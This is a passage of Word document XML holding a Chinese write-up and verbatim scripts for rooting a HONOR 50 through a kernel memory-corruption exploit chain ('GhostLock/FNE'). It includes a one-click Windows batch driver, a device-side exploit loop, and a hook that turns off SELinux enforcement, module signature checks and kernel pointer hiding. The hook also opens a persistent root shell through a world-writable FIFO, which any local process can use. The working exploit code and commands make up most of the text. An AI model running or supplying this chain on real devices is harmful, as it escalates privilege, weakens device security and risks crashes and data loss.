          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">，chain_status 最终为 slidemismatch。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根因：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">FNE 每次开机重新随机化，静态表里的 slide-0 地址会去 patch 错误的 .ko 条目；本次实测 slide = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Microsoft YaHei" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">0x10e5800000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">，真实与 fake 的 commit_creds 恰好差 0x30。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在 root 阶段导出真实 /proc/kallsyms，按实测 slide 重定位后合并符号表；但最终因为过滤符号问题，仍然以 ksud insmod 为准。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7.5 PowerShell 字符串插值截断 shell 命令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现象：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">通过 adb shell 直接执行带 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Microsoft YaHei" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">$(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的命令时，命令被本地 PowerShell 先行解析，传到设备上已经残缺。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="6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统一改为“本地写 .sh 文件 → adb push → adb shell sh 执行”，彻底避免本地插值。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3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">八、完整复现步骤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以下命令按顺序执行即可复现（设备需已解锁 USB 调试、adb 已授权）。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3B6EA5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤 1：确认前提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adb devices -l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adb shell getprop ro.build.fingerprint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adb shell getenforce        # 初始应为 Enforcing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3B6EA5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤 2：触发内核漏洞（设备端本地执行）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fne_local.sh 与 e 位于 /data/local/tmp/ksu_fne/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adb shell su -c '' 2&gt;/dev/null; adb shell "sh /data/local/tmp/ksu_fne/fne_local.sh"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脚本会安静化设备 -&gt; 竞态触发 -&gt; 成功后 setsid 拉起 chain_hook.sh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观察：/data/local/tmp/ksu_fne/chain.log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期望：id 显示 uid=0、context=u:r:kernel:s0、Permissive；sig_enforce=N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="E0A800" w:sz="18" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="FFF7E6" w:val="clear"/>
        <w:spacing w:after="120" w:before="120" w:line="300"/>
        <w:ind w:left="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8A6100"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">失败处理 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">若利用失败，设备可能 panic 重启。等待设备重新上线（adb devices 重新出现）后重跑即可，属于概率性失败。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3B6EA5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤 3：确认常驻 root 通道已建立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adb shell "cat /data/local/tmp/rs.out"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期望看到：ROOT SHELL CHANNEL UP uid=0 ctx=u:r:kernel:s0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3B6EA5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤 4：通过通道投递 KernelSU 晚加载脚本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adb push drive_ksud_insmod.sh /data/local/tmp/ksu_fne/drive_ksud_insmod.sh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adb shell "cat /data/local/tmp/ksu_fne/drive_ksud_insmod.sh &gt; /data/local/tmp/rs.in"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adb shell "sleep 8; tail -40 /data/local/tmp/rs.out"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期望：magiskpolicy rc=0、ksud insmod rc=0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3B6EA5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤 5：验证 root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adb shell "su -c 'id; echo domain=$(cat /proc/self/attr/current)'"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期望：uid=0(root) ... domain=u:r:ksu:s0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adb shell "grep kernelsu /proc/modules"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期望：kernelsu ... - Live 0x... (OE)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adb shell "su -c 'mkdir -p /data/local/tmp/roottest &amp;&amp; echo rootwrite &gt; \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    /data/local/tmp/roottest/proof.txt &amp;&amp; cat /data/local/tmp/roottest/proof.txt'"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3B6EA5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤 6：确认 SELinux 已恢复强制模式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adb shell getenforce        # 期望 Enforcing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adb shell "su -c 'id'"      # 仍应返回 uid=0(root)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3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">九、持久性与风险说明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9.1 关于重启后是否保留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本次采用的是 KernelSU 的 late-load（晚加载）模式：模块是在系统启动完成之后才被手动 insmod 进内核的，因此它默认不会在下次开机时自动恢复。实测中设备内也没有发现针对 ksu 的 init 触发服务。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要让 root 在重启后依然存在，需要在每次开机后重新执行步骤 2～4；另一种思路是用 /data/adb/ksu/bin/bootctl 把 LKM 写入 boot 分区实现持久化，但这会修改启动镜像，属于不可逆操作，本记录未执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="E0A800" w:sz="18" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="FFF7E6" w:val="clear"/>
        <w:spacing w:after="120" w:before="120" w:line="300"/>
        <w:ind w:left="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8A6100"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">建议 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">如果只是想长期稳定使用 root，建议先确认是否具备 boot 分区刷写条件（解锁状态、可用 boot.img、可回滚方案），再决定是否走 bootctl 持久化路线。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9.2 风险点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sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">内核内存破坏利用具有概率性，失败可能导致 panic 重启，极端情况下可能造成数据损坏 —— 务必先备份重要数据。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sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">把 SELinux 短暂置为 Permissive 会打开一个安全窗口，期间系统对恶意行为的防护显著下降，操作应尽快完成并立即恢复 Enforcing。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sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">kptr_restrict 被清零后内核地址对用户态可见，属于信息泄露风险，验证完成后可考虑恢复原值。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eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">该操作会使设备进入非官方状态，可能导致保修失效、OTA 升级失败或部分金融类应用拒绝运行。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3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">十、脚本源代码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本仓库 scripts/ 目录下的全部脚本源代码，逐字收录如下。Windows 侧主脚本为 root_honor50.cmd，设备侧为 4 个 shell 脚本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="E0A800" w:sz="18" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="FFF7E6" w:val="clear"/>
        <w:spacing w:after="120" w:before="120" w:line="300"/>
        <w:ind w:left="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8A6100"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">编码说明 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">root_honor50.cmd 以 UTF-8 with BOM 保存并在开头执行 chcp 65001，保证中文提示在 cmd.exe 中正常显示；设备侧 .sh 为 UTF-8 无 BOM。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10.1  scripts/root_honor50.cmd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Windows 侧一键提权主脚本（双击运行；已 root 时自动跳过漏洞利用阶段）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@echo off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setlocal EnableDelayedExpansion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chcp 65001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title HONOR 50 (NTH-AN00) KernelSU 一键提权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============================================================================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 HONOR 50 (NTH-AN00) 一键提权脚本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 链路：GhostLock/FNE 内核漏洞 -&gt; 常驻 root FIFO 通道 -&gt; ksud 晚加载 KernelSU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 用法：手机开启 USB 调试并用数据线连接，双击本脚本即可。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 风险：内核内存破坏利用具有概率性，失败可能导致手机 panic 重启；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       重启后等手机开机，重新运行本脚本即可。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============================================================================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"D=/data/local/tmp/ksu_fne"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"HERE=%~dp0"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"TOOLS=%HERE%..\tools"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"DEVSH=%HERE%device"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"TMPF=%TEMP%\honor50_root"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not exist "%TMPF%" mkdir "%TMPF%" &gt;nul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================================================================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 HONOR 50 (NTH-AN00) KernelSU 晚加载 一键提权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 GhostLock / FNE 内核漏洞链  +  ksud insmod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================================================================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---------------- 0. 定位 adb ----------------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"ADB="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where adb &gt;nul 2&gt;&amp;1 &amp;&amp; set "ADB=adb"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not defined ADB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for %%P in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"%LOCALAPPDATA%\Android\Sdk\platform-tools\adb.exe"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"%USERPROFILE%\platform-tools\adb.exe"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"C:\platform-tools\adb.exe"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"C:\adb\adb.exe"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"C:\Android\platform-tools\adb.exe"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) do if not defined ADB if exist %%P set "ADB=%%~P"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not defined ADB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[错误] 没有找到 adb。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       请安装 Android Platform Tools，把 adb.exe 加入 PATH，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       或者把 platform-tools 目录放到 C:\platform-tools\。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goto :fail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[0/7] adb = %ADB%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---------------- 1. 检测设备 ----------------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"DEV="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for /f "skip=1 tokens=1,2" %%a in ('"%ADB%" devices 2^&gt;nul') do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if /i "%%b"=="device" if not defined DEV set "DEV=%%a"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not defined DEV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[错误] 没有检测到已授权的 adb 设备。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       检查：USB 调试已开启、手机上已点“允许 USB 调试”、数据线正常。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goto :fail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[1/7] 设备序列号 = %DEV%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getprop ro.product.model &gt; "%TMPF%\model.txt" 2&gt;nul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"MODEL="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/p MODEL=&lt;"%TMPF%\model.txt"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      机型       = !MODEL!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---------------- 2. 是否已经是 root ----------------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su -c id &gt; "%TMPF%\su0.txt" 2&gt;nul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findstr /c:"uid=0" "%TMPF%\su0.txt" &gt;nul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not errorlevel 1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[2/7] 设备已经处于 root 状态（KernelSU 已加载），跳过漏洞利用阶段。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goto :verify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[2/7] 当前未 root，开始执行提权流程。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---------------- 3. 推送工具链与脚本 ----------------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[3/7] 推送工具链与脚本到设备 %D% ...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"mkdir -p %D% /storage/emulated/0/root/_fne" &gt;nul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push "%TOOLS%\e"             %D%/e            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push "%TOOLS%\fne_syms.txt"  %D%/fne_syms.txt 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push "%TOOLS%\kernelsu.ko"   %D%/kernelsu.ko  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push "%TOOLS%\ksud"          %D%/ksud         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push "%TOOLS%\magiskpolicy"  %D%/magiskpolicy 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push "%TOOLS%\ksu_rules"     %D%/ksu_rules    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push "%DEVSH%\fne_local.sh"  %D%/fne_local.sh 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push "%DEVSH%\chain_hook.sh" %D%/chain_hook.sh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push "%DEVSH%\ksu_lateload.sh"    /data/local/tmp/ksu_lateload.sh   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push "%DEVSH%\restore_enforce.sh" /data/local/tmp/restore_enforce.sh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"chmod 755 %D%/e %D%/ksud %D%/magiskpolicy %D%/fne_local.sh %D%/chain_hook.sh /data/local/tmp/ksu_lateload.sh /data/local/tmp/restore_enforce.sh" &gt;nul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"rm -f /data/local/tmp/rs.in /data/local/tmp/rs.out %D%/chain.log %D%/chain_status %D%/fake_ksyms.txt /storage/emulated/0/root/_fne/fne_run.log" &gt;nul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      推送完成。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---------------- 4. 触发内核漏洞利用 ----------------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[4/7] 触发 GhostLock / FNE 内核漏洞利用 ...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      这是内存破坏型利用，可能 panic 重启手机；重启后重新运行本脚本即可。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      设备端会自己重试，预计 1-5 分钟，期间请勿拔线 ...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"sh %D%/fne_local.sh" &gt; "%TMPF%\fne_out.log"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      设备端流程已返回。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---------------- 5. 等待常驻 root 通道 ----------------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[5/7] 等待常驻 root shell 通道 ...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"CHAN="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for /l %%i in (1,1,40) do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if not defined CHAN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"%ADB%" shell "grep -c 'ROOT SHELL CHANNEL UP' /data/local/tmp/rs.out 2&gt;/dev/null" &gt; "%TMPF%\chan.txt" 2&gt;nul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set "CNT="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set /p CNT=&lt;"%TMPF%\chan.txt"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if "!CNT!"=="1"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set "CHAN=1"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) else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timeout /t 3 /nobreak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not defined CHAN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[失败] 没有建立 root 通道，本次利用未成功。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       常见原因：内存破坏利用是概率性的，本轮没打中；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                 或者 W1b 没拿到（sig_enforce 仍为 Y）。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       处理：如果手机已经重启，等它开机后重新运行本脚本。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       现场日志：%D%/chain.log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                 /storage/emulated/0/root/_fne/fne_run.log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goto :fail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      root 通道已建立。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---------------- 6. 通过通道加载 KernelSU ----------------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[6/7] 通过 root 通道加载 KernelSU 模块（ksud insmod）...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"echo sh /data/local/tmp/ksu_lateload.sh &gt; /data/local/tmp/rs.in" &gt;nul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"LOADED="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for /l %%i in (1,1,40) do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if not defined LOADED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"%ADB%" shell "grep -c KSUTRY_DONE /data/local/tmp/rs.out 2&gt;/dev/null" &gt; "%TMPF%\done.txt" 2&gt;nul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set "DN="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set /p DN=&lt;"%TMPF%\done.txt"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if "!DN!"=="1"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set "LOADED=1"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) else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timeout /t 3 /nobreak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not defined LOADED echo [警告] 没等到 ksud 完成标记，仍继续做验证。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"grep kernelsu /proc/modules" &gt; "%TMPF%\mod.txt" 2&gt;nul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      模块状态 ：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type "%TMPF%\mod.txt"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---------------- 7. 恢复 SELinux 为 Enforcing ----------------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[7/7] 把 SELinux 切回 Enforcing ...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"echo sh /data/local/tmp/restore_enforce.sh &gt; /data/local/tmp/rs.in" &gt;nul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timeout /t 10 /nobreak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rem ---------------- 验证 ----------------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:verify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======================== 验 证 结 果 ========================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getenforce &gt; "%TMPF%\enf.txt" 2&gt;nul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"ENF="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/p ENF=&lt;"%TMPF%\enf.txt"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SELinux      : !ENF!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"su -c id" &gt; "%TMPF%\suid.txt" 2&gt;nul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"SUID="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/p SUID=&lt;"%TMPF%\suid.txt"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su -c id     : !SUID!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"su -c 'cat /proc/self/attr/current'" &gt; "%TMPF%\dom.txt" 2&gt;nul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"DOM="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/p DOM=&lt;"%TMPF%\dom.txt"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su 运行域    : !DOM!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"grep kernelsu /proc/modules" &gt; "%TMPF%\mod2.txt" 2&gt;nul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"MOD="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/p MOD=&lt;"%TMPF%\mod2.txt"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内核模块     : !MOD!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"%ADB%" shell "su -c 'echo rootwrite &gt; /data/local/tmp/roottest/proof.txt &amp;&amp; cat /data/local/tmp/roottest/proof.txt'" &gt; "%TMPF%\wr.txt" 2&gt;nul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"WR="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/p WR=&lt;"%TMPF%\wr.txt"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root 写测试  : !WR!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=============================================================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findstr /c:"uid=0" "%TMPF%\suid.txt" &gt;nul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errorlevel 1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[失败] su 提权没有成功。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       请把上面的输出连同 %D%/chain.log 一起反馈。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goto :fail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/i not "!ENF!"=="Enforcing" (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[提示] SELinux 目前是 !ENF!，尚未切回 Enforcing。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       手动恢复：adb shell "su -c 'echo 1 ^&gt; /sys/fs/selinux/enforce'"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================================================================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 成功：设备已获得 root（uid=0），KernelSU 模块 Live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================================================================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 用法：adb shell su -c "命令"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   提醒：本次是 late-load（开机后手动加载），重启后需要重新运行本脚本。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pause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exit /b 0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:fail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流程中止。按任意键退出。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pause &gt;nul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exit /b 1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10.2  scripts/device/fne_local.sh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漏洞利用驱动脚本（来自 fneroot 应用 assets，本仓库原样收录）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#!/system/bin/sh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GhostLock-HonorFne 全程本地版（无 adb）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原 run_w2.sh 的 adb shell "X" -&gt; sh -c "X"; adb reboot -&gt; 提示手动重启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说明：这是漏洞利用的驱动脚本。它先安静化设备（降低竞态噪声），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然后反复执行 W1(--write1) / W2 两段利用，直到 root 到手。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W2 成功后漏洞进程会以 setsid 拉起 chain_hook.sh，后者负责把 root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权限搬进 FIFO 通道，所以本脚本只要看到日志里出现 "child is root!" 就停手。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E="/data/local/tmp/ksu_fne/e"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D="/data/local/tmp/ksu_fne"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LOG="/storage/emulated/0/root/_fne/fne_run.log"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SYNC="GL_AIM_DM=1 GL_W1_ATTEMPTS=2 GL_ROUTE_ATTEMPTS=1 GL_HOLD_CHAIN=1 GL_HOLD_WAITER=1 GL_PUNCH_IN_WINDOW=1 GL_PUNCH_DELAY_USEC=0 GL_MCAST_ROUTE=1 GL_PROBE_BOOTID=0 GL_SPRAY_TEST=0 GL_STAMP_SYNC=1"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say() { echo "[$(date +%H:%M:%S)] $*" | tee -a "$LOG"; }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抓一次 panic 现场（尽力而为）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grab_pstore() {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for f in /sys/fs/pstore/*; do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[ -f "$f" ] || continue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say "PSTORE: $f"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cat "$f" &gt;&gt; "$LOG"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done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}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安静化设备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settle() {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say "settle: force-stop 相册/搜索"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am force-stop com.hihonor.photos &gt;/dev/null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am force-stop com.hihonor.searchservice &gt;/dev/null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am kill-all &gt;/dev/null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pm trim-caches 999999999999 &gt;/dev/null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say "settle: 静默 5s"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i=5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while [ $i -gt 0 ]; do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say "  倒计时 $i"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sleep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i=$((i-1))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done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}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检查 kernelsu 是否真正可用（不是"假 Live"）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三重判据：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1) /proc/modules 里有 kernelsu 且地址非 0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2) /sys/module/kernelsu/version 可读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3) /sys/module/kernelsu/parameters/ 目录存在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注意：KernelSU 3.3.0 加载后不再创建 /sys/module/kernelsu/ 节点，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因此本函数在本机上恒为 false，流程实际靠日志里的 "child is root!" 收尾。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ksu_loaded() {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# 判据 1：模块记录存在（含地址检查）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grep -q "^kernelsu " /proc/modules 2&gt;/dev/null || return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# 判据 2：sysfs version 节点存在且非空（这是最硬的条件）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[ -r /sys/module/kernelsu/version ] || return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V=$(cat /sys/module/kernelsu/version 2&gt;/dev/null)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[ -n "$V" ] || return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# 判据 3：parameters 目录存在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[ -d /sys/module/kernelsu/parameters ] || return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say "KSU 校验: version=$V (真 Live)"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return 0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}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仅用于诊断：报告为什么 ksu_loaded 失败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ksu_diag() {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say "--- KSU 诊断 ---"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say "modules: $(grep '^kernelsu ' /proc/modules 2&gt;/dev/null || echo NONE)"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if [ -r /sys/module/kernelsu/version ];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say "sysfs version: $(cat /sys/module/kernelsu/version 2&gt;/dev/null)"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else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say "sysfs version: MISSING (模块未完成初始化)"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if [ -d /sys/module/kernelsu/parameters ];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say "sysfs parameters: OK"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else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say "sysfs parameters: MISSING"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say "--- 诊断结束 ---"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}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say "=== GhostLock-HonorFne 本地流程启动 ==="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say "E=$E  D=$D"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[ -f "$E" ] || { say "FATAL: $E 文件不存在"; exit 1; }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[ -x "$E" ] || say "WARN: $E 无 x 位，尝试 sh 调用"; ls -l "$E" &gt;&gt;"$LOG" 2&gt;&amp;1; id &gt;&gt;"$LOG" 2&gt;&amp;1; getenforce &gt;&gt;"$LOG"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[ -f "$D/chain_hook.sh" ] || { say "FATAL: $D/chain_hook.sh 不存在"; exit 1; }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ADJ=0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TRY=1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while [ "$TRY" -le 8 ]; do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say "----- TRY $TRY  ADJ=$ADJ -----"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settle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grab_pstore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if ksu_loaded;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say "KernelSU 已在运行 -&gt; 结束"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break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# W1: 尝试写 SELinux enforce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say "W1 try (--write1)"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env $SYNC "$E" --write1 &gt;&gt; "$LOG"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RC=$?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say "W1 返回 rc=$RC"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# 若 W1 成功，进一步跑 W2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# 只跑 1 轮：W2 成功(root)后其 park 的 waiter 不能被二次 PI 操作打扰，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# 否则踢到 pi_blocked_on ghost -&gt; panic。root 到手即停。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W2N=0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while [ "$W2N" -lt 1 ]; do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W2N=$((W2N+1))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say "W2 round $W2N/1 (ADJ=$ADJ)"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env $SYNC GL_W2_ROUNDS=1 GL_W2_CRED_ADJ=$ADJ "$E" &gt;&gt; "$LOG"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RRC=$?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say "W2 返回 rc=$RRC"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if grep -q "child is root!" "$LOG" 2&gt;/dev/null;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say "ROOT 到手 -&gt; 停止 W2，不再叠加 PI 操作"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break 2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if ksu_loaded;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say "KSU READY"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break 2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# 若 erase_ran 且 child uid 仍是 2000，则调 ADJ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if grep -q "erase_ran=1" "$LOG" 2&gt;/dev/null &amp;&amp; grep -q "child uid = 2000" "$LOG" 2&gt;/dev/null;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ADJ=$((ADJ+8))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[ "$ADJ" -gt 16 ] &amp;&amp; ADJ=16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say "ADJ 提升到 $ADJ"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done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grab_pstore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TRY=$((TRY+1))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say "本轮结束，准备下一轮（建议手动重启以换布局）"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say "如需继续，重启后重新执行本脚本；否则退出。"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done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say "=== 流程结束 ==="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say "若未见 KSU READY，请查看 $LOG 与 /sys/fs/pstore/"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10.3  scripts/device/chain_hook.sh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root 钩子脚本，含本仓库新增的常驻 root 通道改造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#!/system/bin/sh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FNE-AN00 KernelSU late-load chain (ghostlock root-child hook).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Launched detached (setsid) by the patched .ghostlock_root.sh right after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the early SELinux policy fix: this shell runs uid 0, u:r:kernel:s0,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SELinux permissive, and sig_enforce has been cleared by W1b (--write1,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mode-5 write). All output to chain.log. The final re-enable of enforcing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may kill this shell (FNE kills kernel:s0 processes at the flip) — by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design it is the very last statement.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D=/data/local/tmp/ksu_fne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L=$D/chain.log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ST=$D/chain_status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export PATH=/system/bin:/system/xbin:/vendor/bin:$PATH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exec &gt;&gt;$L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running &gt; $ST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"=== chain start $(date) pid=$$ ==="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id 2&gt;&amp;1; getenforce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sync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--- [ADDED] persistent root shell channel ---------------------------------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这一步是本仓库的核心改造：漏洞进程的 uid=0 上下文是瞬态的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（u:r:kernel:s0，SELinux 恢复 Enforcing 时会被杀），必须在它死之前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把 root 权限搬进一条可长期复用的 FIFO 通道。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rm -f /data/local/tmp/rs.in /data/local/tmp/rs.out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mkfifo /data/local/tmp/rs.in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chmod 666 /data/local/tmp/rs.in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: &gt; /data/local/tmp/rs.out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chmod 666 /data/local/tmp/rs.out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"ROOT SHELL CHANNEL UP uid=$(id -u) ctx=$(cat /proc/self/attr/current 2&gt;/dev/null)" &gt;&gt; /data/local/tmp/rs.out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setsid /system/bin/sh -c 'while true; do /system/bin/sh &lt;/data/local/tmp/rs.in &gt;&gt;/data/local/tmp/rs.out 2&gt;&amp;1; done' &lt;/dev/null &gt;/dev/null 2&gt;&amp;1 &amp;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"root shell channel pid=$!"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0 &gt; /proc/sys/kernel/kptr_restrict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cat /proc/kallsyms &gt; /data/local/tmp/real_kallsyms.txt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chmod 644 /data/local/tmp/real_kallsyms.txt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cp $D/fake_ksyms.txt /data/local/tmp/fake_ksyms_snapshot.txt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chmod 644 /data/local/tmp/fake_ksyms_snapshot.txt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"kallsyms snapshot done ($(wc -l &lt; /data/local/tmp/real_kallsyms.txt 2&gt;/dev/null) lines)"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--- [ADDED] end -----------------------------------------------------------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idempotence: a second hook launch on the same boot must not double-load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grep -q kernelsu /proc/modules 2&gt;/dev/null;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"kernelsu already loaded - nothing to do"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ok &gt; $ST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exit 0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--- gate 1: W1b result (sig_enforce must be N) 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sv=$(cat /sys/module/module/parameters/sig_enforce 2&gt;/dev/null)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"sig_enforce=$sv"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[ "$sv" != "N" ] &amp;&amp; [ "$sv" != "0" ];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"!! sig_enforce still set (W1b missed this boot) - aborting; device"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   stays permissive; reboot + regrind retries W1b"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sigfail &gt; $ST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sync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exit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--- oops protection during insmod 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po=$(cat /proc/sys/kernel/panic_on_oops 2&gt;/dev/null); po=${po:-1}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"panic_on_oops=$po"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0 &gt; /proc/sys/kernel/panic_on_oops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回读确认：写失败则 insmod 里任何 oops 都会直接 panic，必须先知道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pn=$(cat /proc/sys/kernel/panic_on_oops 2&gt;/dev/null)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"panic_on_oops now=$pn (want 0)"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[ "$pn" != "0" ];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"!! panic_on_oops 没能写为 0 —— insmod 若 oops 将直接 panic"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--- pristine policy snapshot (before magiskpolicy; feeds the module's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  pristine_policy param for the selinux_hide backup) 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cat /sys/fs/selinux/policy &gt; $D/pristine_policy 2&gt;/dev/null \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&amp;&amp; echo "pristine policy: $(wc -c &lt; $D/pristine_policy) bytes"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--- fake kallsyms: runtime-KASLR-adjusted symbol table (generated by the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  root child from fne_syms.txt + the boot's slide.txt; FNE re-slides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  every boot, slide-0 addresses would patch wrong .ko entries and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  panic on insmod). Covers every SHN_UNDEF of the .ko incl. the 32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  non-kallsyms symbols. Bind-mounted over /proc/kallsyms for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  load_ko's dynamic resolution. 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[ ! -s $D/fake_ksyms.txt ];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"!! fake_ksyms.txt missing/empty (exploit did not generate the"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   runtime kallsyms) - aborting; device stays permissive"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noksyms &gt; $ST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sync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exit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kr=$(cat /proc/sys/kernel/kptr_restrict 2&gt;/dev/null); echo "kptr_restrict=$kr"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0 &gt; /proc/sys/kernel/kptr_restrict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slide sanity: a known symbol must match the REAL kallsyms (root +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CAP_SYSLOG sees runtime addresses; a wrong-slide file would insmod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wrong addresses and panic — abort instead).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R=$(grep -m1 " printk_percpu_data_ready$" /proc/kallsyms 2&gt;/dev/null | cut -d' ' -f1)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F=$(grep -m1 " printk_percpu_data_ready$" $D/fake_ksyms.txt 2&gt;/dev/null | cut -d' ' -f1)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真实 kallsyms 在 kptr_restrict 下可能读不到（R 为空）。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旧逻辑 [ -n "$R" ] 短路 -&gt; 静默跳过校验 -&gt; 未验证的 fake 表被用于 insmod -&gt; 跳飞 panic。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现在：R 为空则显式判定为“未验证”，并且除非显式 ALLOW_UNVERIFIED=1，一律中止。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[ -z "$F" ];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"!! fake_ksyms.txt 里找不到 commit_creds —— 符号表损坏，中止"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badfake &gt; $ST; sync; exit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[ -z "$R" ] || [ "$R" = "0000000000000000" ];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"!! 真实 kallsyms 不可读 (kptr_restrict=$kr) —— slide 无法校验"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   fake commit_creds=$F  (未与真实值比对)"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if [ "${ALLOW_UNVERIFIED:-0}" != "1" ];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echo "!! 中止：不允许用未验证的符号表 insmod（如需强行继续设 ALLOW_UNVERIFIED=1）"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echo unverified &gt; $ST; sync; exit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"!! ALLOW_UNVERIFIED=1 —— 强行继续（风险自负）"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elif [ "$R" != "$F" ];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# 走到这里说明 fake 表与运行内核的 slide 不一致。此时 root 已经到手、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# FIFO 通道已经建立，所以这里直接放弃自动 insmod，把设备留在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# Permissive + root 通道可用的状态，交给上层脚本用官方 ksud insmod 接手。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"!! slide mismatch: real commit_creds=$R fake=$F - aborting"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"$kr" &gt; /proc/sys/kernel/kptr_restrict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"$po" &gt; /proc/sys/kernel/panic_on_oops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slidemismatch &gt; $ST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sync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exit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"slide verified: commit_creds=$F (real=$R)"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cp $D/fake_ksyms.txt $D/fake_kallsyms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! mount --bind $D/fake_kallsyms /proc/kallsyms;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"!! fake kallsyms bind-mount failed - restoring and aborting"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"$kr" &gt; /proc/sys/kernel/kptr_restrict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"$po" &gt; /proc/sys/kernel/panic_on_oops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mountfail &gt; $ST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sync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exit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"fake kallsyms bind-mounted ($(wc -l &lt; $D/fake_kallsyms) lines)"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--- SELinux rules for the ksu domain, live, BEFORE the module (late load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  never applies rules itself; they must pre-exist for post-enforce) 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$D/magiskpolicy --apply $D/ksu_rules --live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mpc=$?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"magiskpolicy exit=$mpc"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[ $mpc -ne 0 ];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"!! magiskpolicy failed - unmounting and aborting (loading the module"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   without rules would brick KSU at the enforce flip)"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umount /proc/kallsyms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"$kr" &gt; /proc/sys/kernel/kptr_restrict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"$po" &gt; /proc/sys/kernel/panic_on_oops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polfail &gt; $ST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sync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exit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ctx=$(cat /proc/self/attr/current 2&gt;/dev/null)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"policy injected (ctx=$ctx)"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--- 保命开关：root 已经到手，KSU insmod 是已知的 panic 爆点 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SKIP_KSU=1 时只做状态恢复就退出，让你先稳住 root 再单独调 insmod。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[ "${SKIP_KSU:-0}" 